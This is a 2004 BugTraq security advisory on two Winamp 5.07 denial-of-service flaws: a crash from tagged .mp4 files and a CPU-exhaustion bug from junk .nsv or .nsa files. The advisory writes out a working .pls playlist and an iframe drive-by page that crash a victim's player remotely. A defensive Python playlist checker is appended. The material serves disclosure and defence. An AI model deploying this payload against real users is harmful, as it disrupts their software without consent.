BugTraq
Winamp 5.07 (latest version) Remote Crash + other stupid shizle Dec 13 2004 07:13PM
b0f www.b0f.net (b0fnet yahoo com)


Winamp 5.07 (latest version) Remote Crash.

+ vuln to cause 100% cpu usage.

13/12/04

I. BACKGROUND

Winamp is a very popular Windows audio and video player. It also has a lot of other features and is used by millions of people across the world.

II. DESCRIPTION

VULN 1.

There is a vuln in Winamp's handling of .mp4 and .m4a files which, when exploited, can remotely crash the victim's Winamp.

The vuln lies in the .mp4 tagging system which Winamp uses. If you use Winamp's built-in feature to edit the tags on .mp4 or .m4a files and insert any data in there, the next time the file is opened it will instantly crash Winamp.

Now how to crash it remotely.

If we create a .pls file containing the data

[playlist]
numberofentries=5
File1=http://b0f.pwp.blueyonder.co.uk/a.mp4
Title1=
Length5=-1
Version=2

and make an HTML page containing an iframe linking to the .pls, like:

<html>
<iframe src="http://b0f.pwp.blueyonder.co.uk/exp2.pls">

Now if the victim clicks a link to a page like

http://b0f.pwp.blueyonder.co.uk/wexp3.htm

it will automatically open the .pls file, load the .mp4 file into Winamp and crash it.

This could also be done with .m3u instead of .pls.

VULN 2.

This one is simple: if you create, say, a 1 MB file (probably smaller) filled with junk and name it with either the .nsv or .nsa file extension, then when opened in Winamp it will cause 100% CPU usage. The bigger the file, the more it will probably slow down the system.

III. ANALYSIS

Vuln 1.

Successful exploitation allows remote attackers to crash the victim's Winamp.

Vuln 2.

Successful exploitation causes 100% cpu usage.

IV. DETECTION

This has been confirmed in the latest version of Winamp, 5.07, and is probably vuln in earlier versions.

V. WORKAROUND

Don't open suspicious .mp4, .m4a, .nsa or .nsv files or click untrusted links.

VI. VENDOR

The vendor has not been contacted.

Why bother? one asks

VII. CREDIT

Alan M aka b0f

(b0fnet (at) yahoo (dot) com)

P.S Buy Tupac - Loyal to the Game

out 14/12/04
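
One way to apply the workaround in section V to playlists before they reach the player, as an added example that is not part of the original advisory: the Python below parses .pls and .m3u text and flags entries that are remote or that use the file types the advisory names. The function names, the list of remote schemes and the sample playlists (with the placeholder host media.example.invalid) are assumptions made for illustration.

```python
"""Flag playlist entries that would make a player fetch remote media or open
the file types named in the advisory. Added example; names are hypothetical."""
from urllib.parse import urlparse
import posixpath

RISKY_EXT = {".mp4", ".m4a", ".nsv", ".nsa"}   # file types from the advisory
REMOTE_SCHEMES = {"http", "https", "ftp"}      # assumed list of remote schemes

def playlist_entries(text):
    """Yield media locations from .pls (FileN=...) or .m3u (one per line)."""
    is_pls = text.lstrip().lower().startswith("[playlist]")
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if is_pls:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower().startswith("file") and value.strip():
                yield value.strip()
        elif not line.startswith("#"):      # skip #EXTM3U / #EXTINF lines
            yield line

def audit_playlist(text):
    """Return (entry, reasons) pairs for entries worth blocking or reviewing."""
    findings = []
    for entry in playlist_entries(text):
        url = urlparse(entry)
        ext = posixpath.splitext(url.path.replace("\\", "/"))[1].lower()
        reasons = []
        if url.scheme.lower() in REMOTE_SCHEMES:
            reasons.append("remote")
        if ext in RISKY_EXT:
            reasons.append("risky-type:" + ext)
        if reasons:
            findings.append((entry, reasons))
    return findings

# Constructed samples; media.example.invalid is a placeholder host.
SAMPLE_PLS = """[playlist]
numberofentries=2
File1=http://media.example.invalid/track.mp4
File2=C:\\Music\\song.mp3
"""
SAMPLE_M3U = "#EXTM3U\n#EXTINF:-1,stream\nhttp://media.example.invalid/clip.nsv\nlocal.ogg\n"

if __name__ == "__main__":
    for name, body in (("sample.pls", SAMPLE_PLS), ("sample.m3u", SAMPLE_M3U)):
        for entry, reasons in audit_playlist(body):
            print(name, entry, ",".join(reasons))
```

A mail or web gateway could run a check like this on .pls and .m3u attachments or downloads and quarantine playlists with findings.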
